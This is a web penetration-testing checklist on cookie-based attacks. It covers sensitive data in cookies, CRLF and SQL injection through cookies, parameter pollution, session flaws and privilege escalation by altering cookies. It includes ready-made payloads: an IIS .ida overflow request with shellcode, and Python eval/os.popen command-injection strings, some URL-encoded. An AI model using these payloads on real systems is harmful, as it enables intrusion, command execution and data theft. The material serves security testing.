Cookie Based Attacks

Checklist

check if anf pii or other sensitive infromation stored in  cookies this in fromation usually includes : email,sessionID, data of birth ,mobile address ,ssn ,etc.
GET  /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a
try injecting some arbitrary cookies using attack such as CRLF injection ,some times it can be used to escalate privilege or if the application malfunction, it can reveal sensitive infromation through stack traces
similar to the parameter poolution, however in this , attacker tried to inject multiple user ID in same user_id  parameter
forcing the server to process cookies larger than the resricted cookie size defined by the server may cause danial of service attack<https://target.com/index.php?param1=xxxxxxxxxxxxxxxxxxxxxx>After input "xxxxxxxxxxxxxxxxxxxxxx" as a value of param1, check your cookies. If there is cookies the value is "xxxxxxxxxxxxxxxxxxxxxx" it means the website is vulnerableReferences: [Hackerone #105363](<https://hackerone.com/reports/105363>)
How to inject the code in Cookies?There are many HTTP interceptors and HTTP editors that can intercept the HTTP request before it is sent to the server. Then the tester can introduce his malicious SQL statement in the cookie field.It’s like a get/post based SQL Injection, except that certain characters can’t be used. For example, ‘**;**‘ and ‘**,**‘ are typically treated as delimiters, so they end the injection if they aren’t URL-encoded.Cookie : sessionId=xxxbad1fdc’ order by 1# (Normal)_Cookie : sessionId=xxxbad1fdc’ order by 2# (Error)_after error sqlmap -u "" --cookie="" -p "" --dbs
1. Assume that cookie utilize a parameter called **user_id=** to rerieve some data2. however , the application is not vulnerability to idor and change **user_id** to victim value dosnt help you3.attacker ,add an addition another  **user_id=** parameter value to rhe cookie with vuctim user ID LIke: **user_id=atacker&user_id=victim**4. Three things can happen here:- the application may retrieve data of victim data- the application may retrieve data of victim data and attacker data- the application is not retrieve data it is not vulnerability
try accessing a protected resource by removing cookies
assume that the value of the cookie parameter "name" is reflected in the applicationchange the "name" value to "xss payload"
1. session doesnt expire on logout2. long session expirey3. session doesnt expire on password reset /change4. concurrent session
1.assume that the application uses mult-organization models2.cookie are used wich organized user can access3.alter the cookie in order to access some other application
  • vertical

1.assume the cookie are used to determine the role of the user2.alter the cookie in order to elevate the role of the user
  • similarly

1.try if the flower users cookies can be used to access higher users function2.try if the cookie of organization 1 user van be used to access function of organizaion 2
when an application utilzes the same session variable for multiple purposes , this can abused by an attacker to trick the application and perform the action as an authenticated or privileged user
eval(compile('for x in range(1):\\n import time\\n time.sleep(20)','a','single'))
**eval(compile("""for x in range(1):\\\\n import os\\\\n os.popen(r'COMMAND').read()""",'','single'))**
eval(compile("""__import__('os').popen(r'COMMAND').read()""",'','single'))
**__import__('os').popen('COMMAND').read()**
param=eval%28compile%28%27for%20x%20in%20range%281%29%3A%0A%20import%20time%0A%20time.sleep%2820%29%27%2C%27a%27%2C%27single%27%29%29
param=eval%28compile%28%22%22%22for%20x%20in%20range%281%29%3A%5Cn%20import%20os%5Cn%20os.popen%28r%27COMMAND%27%29.read%28%29%22%22%22%2C%27%27%2C%27single%27%29%29
param=eval%28compile%28%22%22%22__import__%28%27os%27%29.popen%28r%27COMMAND%27%29.read%28%29%22%22%22%2C%27%27%2C%27single%27%29%29
param=__import__%28%27os%27%29.popen%28%27COMMAND%27%29.read%28%29

Example with one expression

__import__('os').popen('COMMAND').read()

Example with multiple expressions, separated by commas

str("-"*50),__import__('os').popen('COMMAND').read()
 if cookis are using serialized Objects ,try performing insecure Deserialization Checks. portswigger laps

Last updated